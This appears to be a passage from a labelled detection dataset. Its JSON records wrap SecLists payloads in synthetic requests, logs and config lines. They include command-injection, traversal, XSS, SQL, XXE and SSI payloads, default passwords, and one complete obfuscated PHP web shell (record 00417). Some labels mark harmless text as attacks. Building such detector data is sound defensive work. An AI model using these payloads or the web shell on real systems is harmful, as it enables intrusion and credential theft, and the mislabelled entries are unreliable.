/api/ping?host=%7C%7Cecho$IFSHRKGCV$((26%2B87))$(echo$IFSHRKGCV)HRKGCV| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho$IFSHRKGCV$((26%2B87))$(echo$IFSHRKGCV)HRKGCV|", "injection_type": "cmd"}}]} {"id": "seclists_00396", "source": "seclists", "source_license": "MIT", "text": "password: KTI,admin,123456,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "KTI,admin,123456,"}}]} {"id": "seclists_00397", "source": "seclists", "source_license": "MIT", "text": "filename=\"%26%26echo%20FFNJFE$((44%2B38))$(echo%20FFNJFE)FFNJFE%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26%26echo%20FFNJFE$((44%2B38))$(echo%20FFNJFE)FFNJFE%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00398", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">List-style-image</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "List-style-image", "injection_type": "XSS"}}]} {"id": "seclists_00399", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<body onload=alert(1)> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onload=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00400", "source": "seclists", "source_license": "MIT", "text": "filename=;system('/usr/bin/id')", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";system('/usr/bin/id')", "injection_type": "cmd"}}]} {"id": "seclists_00401", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_referer\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_referer\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00402", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#60", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#60", "injection_type": "cmd"}}]} {"id": "seclists_00403", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=xxxxxxx\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "xxxxxxx"}}]} {"id": "seclists_00404", "source": "seclists", "source_license": "MIT", "text": "filename=!", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "!", "injection_type": "cmd"}}]} {"id": "seclists_00405", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<body onmousemove=\"alert(1)\">test</body>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onmousemove=\"alert(1)\">test</body>", "injection_type": "XSS"}}]} {"id": "seclists_00406", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&id HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&id", "injection_type": "cmd"}}]} {"id": "seclists_00407", "source": "seclists", "source_license": "MIT", "text": "filename=%0a id %0a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0a id %0a", "injection_type": "cmd"}}]} {"id": "seclists_00408", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ../../../../../../../../../../../../etc/passwd%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "../../../../../../../../../../../../etc/passwd%00", "injection_type": "cmd"}}]} {"id": "seclists_00409", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_00410", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<math><brute xlink:href=javascript:alert(1)>click HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<math><brute xlink:href=javascript:alert(1)>click", "injection_type": "XSS"}}]} {"id": "seclists_00411", "source": "seclists", "source_license": "MIT", "text": "filename=%20echo%20HVFWAN$((72%2B27))$(echo%20HVFWAN)HVFWAN|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20echo%20HVFWAN$((72%2B27))$(echo%20HVFWAN)HVFWAN|", "injection_type": "cmd"}}]} {"id": "seclists_00412", "source": "seclists", "source_license": "MIT", "text": "filename=<?", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<?", "injection_type": "cmd"}}]} {"id": "seclists_00413", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=IMG Embedded commands 1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IMG Embedded commands 1", "injection_type": "XSS"}}]} {"id": "seclists_00414", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%203%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%203%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_00415", "source": "seclists", "source_license": "MIT", "text": "filename=&#00060", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#00060", "injection_type": "cmd"}}]} {"id": "seclists_00416", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ;ls -la", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";ls -la", "injection_type": "cmd"}}]} {"id": "seclists_00417", "source": "seclists", "source_license": "MIT", "text": "<?php // Usage example: GET /another_obfuscated_phpshell.php?lol=ls%20-al\n$S=array(m(\"ncoai\",\"msyte\", \"cocain\"),m(\"sir\",\"cex\",\"iris\"),m(\"otab\",\"lshe\",\"taboo\").\"_\".m(\"sir\",\"cex\",\"iris\"),m(\"gbledin\",\"upasthr\",\"bleeding\"));\n$TR=m(\"etroubl\",\"edisabl\",\"trouble\");$MK=m(\"dpreambl\",\"sfunctio\",\"preambled\");$D=explode(\",\",ini_get($TR.'_'.$MK));$P=$_REQUEST;\nfunction m($a,$b,$c) {return str_replace(str_split($a), str_split($b), $c);}\nforeach($S as $A) {\n if(!in_array($A, $D)) {\n if($A == m(\"ncoai\",\"msyte\",\"cocain\")) $A($P['lol']);\n elseif($A == m(\"sir\",\"cex\",\"iris\")) {\n exec(\"$P 2>&1\", $arr);\n echo join(\"\\n\",$arr).\"\\n\";\n } else echo $A($P['lol']);\n exit;\n }\n}", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "another-obfuscated-phpshell.php"}}]} {"id": "seclists_00418", "source": "seclists", "source_license": "MIT", "text": "filename=\".print(`echo%20IFQMUW\\necho%20$((62%2B32))\\necho%20IFQMUW\\necho%20IFQMUW`)%3BIFQMUW", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\".print(`echo%20IFQMUW\\necho%20$((62%2B32))\\necho%20IFQMUW\\necho%20IFQMUW`)%3BIFQMUW", "injection_type": "cmd"}}]} {"id": "seclists_00419", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20", "injection_type": "cmd"}}]} {"id": "seclists_00420", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_00421", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=;echo$IFSXTEPMK$((70%2B42))$(echo$IFSXTEPMK)XTEPMK%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo$IFSXTEPMK$((70%2B42))$(echo$IFSXTEPMK)XTEPMK%7C", "injection_type": "cmd"}}]} {"id": "seclists_00422", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=PLANET Technology Corp.,admin,[^_^],\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "PLANET Technology Corp.,admin,[^_^],"}}]} {"id": "seclists_00423", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 3=3';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 3=3", "injection_type": "SQL"}}]} {"id": "seclists_00424", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></ul>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></ul>", "injection_type": "XSS"}}]} {"id": "seclists_00425", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<canvas onmouseover=\"alert(1)\">test</canvas>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<canvas onmouseover=\"alert(1)\">test</canvas>", "injection_type": "XSS"}}]} {"id": "seclists_00426", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: |echo$IFSXACUZH$((38%2B20))$(echo$IFSXACUZH)XACUZH%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo$IFSXACUZH$((38%2B20))$(echo$IFSXACUZH)XACUZH%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00427", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow", "injection_type": "cmd"}}]} {"id": "seclists_00428", "source": "seclists", "source_license": "MIT", "text": "filename=%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t\t25%5c..%25%5c..%255cboot.ini", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t\t25%5c..%25%5c..%255cboot.ini", "injection_type": "cmd"}}]} {"id": "seclists_00429", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00430", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><x%0Aonxxx=1</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x%0Aonxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_00431", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:dale@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "dale"}}]} {"id": "seclists_00432", "source": "seclists", "source_license": "MIT", "text": "filename=--sp_password", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "--sp_password", "injection_type": "cmd"}}]} {"id": "seclists_00433", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \")) or benchmark(10000000,MD5(1))#", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\")) or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_00434", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>:target {color:red;}</style><dfn id=x style=\"transition:color 1s\" ontransitionend=alert(1)></dfn></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color:red;}</style><dfn id=x style=\"transition:color 1s\" ontransitionend=alert(1)></dfn>", "injection_type": "XSS"}}]} {"id": "seclists_00435", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=bruce\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "bruce"}}]} {"id": "seclists_00436", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=*(|(objectclass=*)) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*(|(objectclass=*))", "injection_type": "SQL"}}]} {"id": "seclists_00437", "source": "seclists", "source_license": "MIT", "text": "filename=&#000060", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#000060", "injection_type": "cmd"}}]} {"id": "seclists_00438", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#X0003c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X0003c", "injection_type": "cmd"}}]} {"id": "seclists_00439", "source": "seclists", "source_license": "MIT", "text": "password: toolbox\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "toolbox"}}]} {"id": "seclists_00440", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%7Cecho%20EUMDZA$((75%2B60))$(echo%20EUMDZA)EUMDZA\\ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho%20EUMDZA$((75%2B60))$(echo%20EUMDZA)EUMDZA\\", "injection_type": "cmd"}}]} {"id": "seclists_00441", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<blink draggable=\"true\" ondrag=\"alert(1)\">test</blink>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<blink draggable=\"true\" ondrag=\"alert(1)\">test</blink>", "injection_type": "XSS"}}]} {"id": "seclists_00442", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d", "injection_type": "cmd"}}]} {"id": "seclists_00443", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:kimkim@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "kimkim"}}]} {"id": "seclists_00444", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<foo><![CDATA[' or 1=1 or ''=']]></foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<foo><![CDATA[' or 1=1 or ''=']]></foo>", "injection_type": "XXE"}}]} {"id": "seclists_00445", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7Cecho%20NIEMKE$((13%2B11))$(echo%20NIEMKE)NIEMKE", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho%20NIEMKE$((13%2B11))$(echo%20NIEMKE)NIEMKE", "injection_type": "cmd"}}]} {"id": "seclists_00446", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><a draggable=\"true\" ondragend=\"alert(1)\">test</a></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<a draggable=\"true\" ondragend=\"alert(1)\">test</a>", "injection_type": "XSS"}}]} {"id": "seclists_00447", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=../ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "../", "injection_type": "cmd"}}]} {"id": "seclists_00448", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf }", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "}", "injection_type": "cmd"}}]} {"id": "seclists_00449", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'hi') or ('a'='a';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "hi') or ('a'='a", "injection_type": "SQL"}}]} {"id": "seclists_00450", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"remote_port\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"remote_port\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00451", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:D-Link,Admin,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "D-Link,Admin,<BLANK>,"}}]} {"id": "seclists_00452", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Intel,NICONEX,NICONEX,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Intel,NICONEX,NICONEX,"}}]} {"id": "seclists_00453", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:lemans@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "lemans"}}]} {"id": "seclists_00454", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: 'print(`echo%20KKQSRA`.`echo%20$((71%2B76))`.`echo%20KKQSRA`.`echo%20KKQSRA`)%3B%23KKQSRA", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'print(`echo%20KKQSRA`.`echo%20$((71%2B76))`.`echo%20KKQSRA`.`echo%20KKQSRA`)%3B%23KKQSRA", "injection_type": "cmd"}}]} {"id": "seclists_00455", "source": "seclists", "source_license": "MIT", "text": "username=' or '1'='1'--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or '1'='1'--", "injection_type": "SQL"}}]} {"id": "seclists_00456", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Livescript\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Livescript", "injection_type": "XSS"}}]} {"id": "seclists_00457", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=library\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "library"}}]} {"id": "seclists_00458", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Digital Equipment,INFO,INFO,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,INFO,INFO,"}}]} {"id": "seclists_00459", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%203%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%203%20-ne%20%24%28echo%20PENGWJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_00460", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<td onclick=\"alert(1)\">test</td>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<td onclick=\"alert(1)\">test</td>", "injection_type": "XSS"}}]} {"id": "seclists_00461", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%26echo%20QOVHPK$((74%2B92))$(echo%20QOVHPK)QOVHPK%2F%2F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%26echo%20QOVHPK$((74%2B92))$(echo%20QOVHPK)QOVHPK%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_00462", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20GJANGU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "injection_type": "cmd"}}]} {"id": "seclists_00463", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area.", "injection_type": "XSS"}}]} {"id": "seclists_00464", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><ol onbeforepaste=\"alert(1)\" contenteditable>test</ol></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ol onbeforepaste=\"alert(1)\" contenteditable>test</ol>", "injection_type": "XSS"}}]} {"id": "seclists_00465", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/passwd\"\">]><foo>&xxe;</foo>\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/passwd\"\">]><foo>&xxe;</foo>\"", "injection_type": "cmd"}}]} {"id": "seclists_00466", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2500", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2500", "injection_type": "cmd"}}]} {"id": "seclists_00467", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.", "injection_type": "XSS"}}]} {"id": "seclists_00468", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%0aecho$IFSEMNGCD$((37%2B86))$(echo$IFSEMNGCD)EMNGCD%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0aecho$IFSEMNGCD$((37%2B86))$(echo$IFSEMNGCD)EMNGCD%26", "injection_type": "cmd"}}]} {"id": "seclists_00469", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, obfuscated, evil tags, JSON</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, obfuscated, evil tags, JSON", "injection_type": "XSS"}}]} {"id": "seclists_00470", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ..%u2216", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%u2216", "injection_type": "cmd"}}]} {"id": "seclists_00471", "source": "seclists", "source_license": "MIT", "text": "filename='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'", "injection_type": "cmd"}}]} {"id": "seclists_00472", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: echo%20KBEMAI$((13%2B27))$(echo%20KBEMAI)KBEMAI'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "echo%20KBEMAI$((13%2B27))$(echo%20KBEMAI)KBEMAI'", "injection_type": "cmd"}}]} {"id": "seclists_00473", "source": "seclists", "source_license": "MIT", "text": "username=hi' or 'x'='x';&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "hi' or 'x'='x';", "injection_type": "SQL"}}]} {"id": "seclists_00474", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: 